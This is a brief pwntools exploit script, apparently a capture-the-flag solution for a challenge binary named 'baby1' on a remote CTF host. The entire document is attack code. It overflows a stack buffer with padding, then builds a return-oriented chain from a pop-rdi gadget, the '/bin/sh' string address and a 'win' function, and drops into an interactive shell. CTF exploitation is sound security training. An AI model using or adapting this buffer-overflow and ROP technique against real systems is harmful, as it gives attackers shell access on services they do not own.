1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| from pwn import *
r = remote('baby-01.pwn.beer', 10001)
e = ELF('./baby1')
binsh = e.search("/bin/sh").next()
pr = 0x0000000000400793
ru = lambda a: r.recvuntil(a)
sl = lambda a: r.sendline(a)
sla = lambda a, b: r.sendlineafter(a, b)
ex = lambda : r.interactive()
p = "A"*0x18
p += p64(pr)
p += p64(binsh)
p += p64(e.symbols['win'])
sl(p)
ru("input: ")
ex();
|
